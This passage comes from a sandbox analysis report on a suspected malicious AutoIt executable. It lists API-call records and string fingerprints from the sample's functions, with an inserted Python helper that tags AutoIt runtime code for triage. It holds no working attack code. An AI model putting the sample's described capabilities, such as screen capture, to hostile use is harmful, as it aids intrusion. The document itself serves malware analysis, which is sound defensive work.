                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                        • GetCursorInfo.USER32(?), ref: 004750C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                        • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                        • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                        • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                        APIs
                                                        • _memset.LIBCMT ref: 0048A259
                                                        • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                        • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                        • GetDesktopWindow.USER32 ref: 0048A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0048A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                        • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                        • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                        • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                        • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                        • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                        • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                        • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                        • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                        • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                        • GetFocus.USER32 ref: 0048C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                        • _memset.LIBCMT ref: 0048C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 5f0392a49041063f851528f21fd0cc095304640a2ca453d75b64e0971020a7f5
                                                        • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                        • Opcode Fuzzy Hash: 5f0392a49041063f851528f21fd0cc095304640a2ca453d75b64e0971020a7f5
                                                        • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0047738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                        • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                        • SelectObject.GDI32(00000006,?), ref: 00477470
                                                        • DeleteObject.GDI32(?), ref: 00477479
                                                        • DeleteDC.GDI32(00000006), ref: 00477480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 38f3fe01feb1b09f86532a0290ba8cf14fcd08a53207e64a02ac188324b8f8dc
                                                        • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                        • Opcode Fuzzy Hash: 38f3fe01feb1b09f86532a0290ba8cf14fcd08a53207e64a02ac188324b8f8dc
                                                        • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
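The records above are recognisable AutoIt runtime code rather than the script's own logic (the report already flags the sample as a compiled AutoIt script): the "[CLASS:" / "[REGEXPTITLE:" / "[ACTIVE" strings are AutoIt's advanced window-title syntax, @GUI_DRAGFILE / @GUI_DROPID are its GUI drop macros, CHECK / COLLAPSE / GETITEMCOUNT are ControlTreeView commands, and "set cd door open" with mciSendStringW is CDTray. Triage goes faster when such records are tagged automatically, so here is an added example (editor's own code, not part of the Joe Sandbox report or of AutoIt) that parses records in this page's layout and matches them against a small fingerprint table. Assumptions: a record ends at its "Instruction Fuzzy Hash" line, the "String ID" field is "$"-separated, the marker strings come from the AutoIt documentation, and the two API-only fingerprints (cursor probe, screen-to-DIB capture) describe the call sequence seen above without claiming which AutoIt built-in it belongs to. The sample input is a constructed excerpt of four records from this page.

```python
"""Triage helper for Joe Sandbox per-function records (the "APIs" / "Similarity" blocks
above): parse each record's direct API calls and its String ID list and match them
against AutoIt runtime fingerprints.  Added example; the fingerprint table is the editor's."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

ApiCall = namedtuple("ApiCall", "name module ref subcall")  # subcall: "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # the "$"-separated String ID entries
    instruction_hash: str = ""

@dataclass(frozen=True)
class Fingerprint:
    name: str
    apis: frozenset = frozenset()     # every name must be a direct call of the record
    strings: frozenset = frozenset()  # substring markers looked up in the String ID list
    min_string_hits: int = 0          # how many markers must be present

FINGERPRINTS = [  # markers from the AutoIt docs; the last two name only the API sequence
    Fingerprint("AutoIt WinTitleMatchMode advanced title syntax", min_string_hits=3,
                strings=frozenset({"[CLASS:", "[REGEXPTITLE:", "[HANDLE:", "[ACTIVE", "[LAST"})),
    Fingerprint("AutoIt GUI drop handling (@GUI_DRAGFILE/@GUI_DROPID)", min_string_hits=2,
                apis=frozenset({"DragQueryFileW", "DragFinish"}),
                strings=frozenset({"@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID"})),
    Fingerprint("AutoIt ControlTreeView command dispatch", min_string_hits=4,
                strings=frozenset({"GETITEMCOUNT", "GETTOTALCOUNT", "ISCHECKED", "UNCHECK", "COLLAPSE"})),
    Fingerprint("AutoIt CDTray via MCI command strings", min_string_hits=2,
                apis=frozenset({"mciSendStringW"}),
                strings=frozenset({"set cd door", "type cdaudio alias cd wait"})),
    Fingerprint("cursor-shape probe (LoadCursorW table + GetCursorInfo)",
                apis=frozenset({"LoadCursorW", "GetCursorInfo"})),
    Fingerprint("screen-to-DIB capture (GetDC/StretchBlt/GetDIBits)",
                apis=frozenset({"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"})),
]

# "• Name.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function X:"
API_RE = re.compile(r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
                    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STR_RE = re.compile(r"^•\s*String ID:\s*(?P<s>.*)$")
HASH_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(?P<h>[0-9A-Fa-f]+)")  # last line of a record

def parse_records(text):
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            cur.apis.append(ApiCall(m["name"], m["mod"], m["ref"], bool(m["sub"])))
        elif m := STR_RE.match(line):
            cur.strings.extend(s for s in m["s"].split("$") if s)
        elif m := HASH_RE.match(line):
            cur.instruction_hash = m["h"]
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.strings:   # trailing record cut off before its hash line
        records.append(cur)
    return records

def classify(rec):
    # Only direct calls count: "Part of subcall" helpers (_memmove, __itow, ...) are shared.
    called = {a.name for a in rec.apis if not a.subcall}
    hits = []
    for fp in FINGERPRINTS:
        if not fp.apis <= called:
            continue
        present = sum(any(marker in s for s in rec.strings) for marker in fp.strings)
        if present >= fp.min_string_hits:
            hits.append(fp.name)
    return hits

# Constructed excerpt: four records from this report, trimmed to the lines the parser reads.
SAMPLE = """\
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
• DragFinish.SHELL32(?), ref: 0048C75E
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
• Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
• GetDC.USER32(00000000), ref: 0047738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
• Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.instruction_hash[:12], "->", "; ".join(classify(rec)) or "no runtime fingerprint")
```

Run it on the full text of a report's function listing and the records that match are runtime boilerplate you can skip; what is left (records with no fingerprint, or with the injection and credential-access APIs the signatures section lists) is where the payload logic lives. Subcall entries are excluded on purpose: they are shared helpers that would otherwise make unrelated records look alike.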
                                                        APIs
                                                          • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                          • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                          • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: a6ae0d61964093dd796ea9672a22b337ae072d1d514d4edeabcf5631447491fe
                                                        • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                        • Opcode Fuzzy Hash: a6ae0d61964093dd796ea9672a22b337ae072d1d514d4edeabcf5631447491fe
                                                        • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                        • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                        • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                        • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                        • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                        • GetCursorPos.USER32(?), ref: 00462F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                        • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                        • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                        • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                        • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 016B2543
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3090
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30A2
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30B4
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30C6
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30D8
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30EA
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30FC
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B310E
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3120
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3132
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3144
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3156
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3168
                                                        • _free.LIBCMT ref: 016B2538
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B255A
                                                        • _free.LIBCMT ref: 016B256F
                                                        • _free.LIBCMT ref: 016B257A
                                                        • _free.LIBCMT ref: 016B259C
                                                        • _free.LIBCMT ref: 016B25AF
                                                        • _free.LIBCMT ref: 016B25BD
                                                        • _free.LIBCMT ref: 016B25C8
                                                        • _free.LIBCMT ref: 016B2600
                                                        • _free.LIBCMT ref: 016B2607
                                                        • _free.LIBCMT ref: 016B2624
                                                        • _free.LIBCMT ref: 016B263C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: e6608b63d31b81715aa65dae19e0b233421eb505d221a95b412a770c398dd6dc
                                                        • Instruction ID: 45ce229936e551107c6ffcccf4f9c95e7d2dd02884824a43b1e44d4a4cb8a255
                                                        • Opcode Fuzzy Hash: e6608b63d31b81715aa65dae19e0b233421eb505d221a95b412a770c398dd6dc
                                                        • Instruction Fuzzy Hash: 8A313872A003069BEB31AB3DDCA4BD6B7EABB14251F10441DE45AD6261EB71B9D0CB24
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 004788D7
                                                        • CoInitialize.OLE32(00000000), ref: 00478904
                                                        • CoUninitialize.OLE32 ref: 0047890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                        • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                        • VariantClear.OLEAUT32(?), ref: 00478C35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
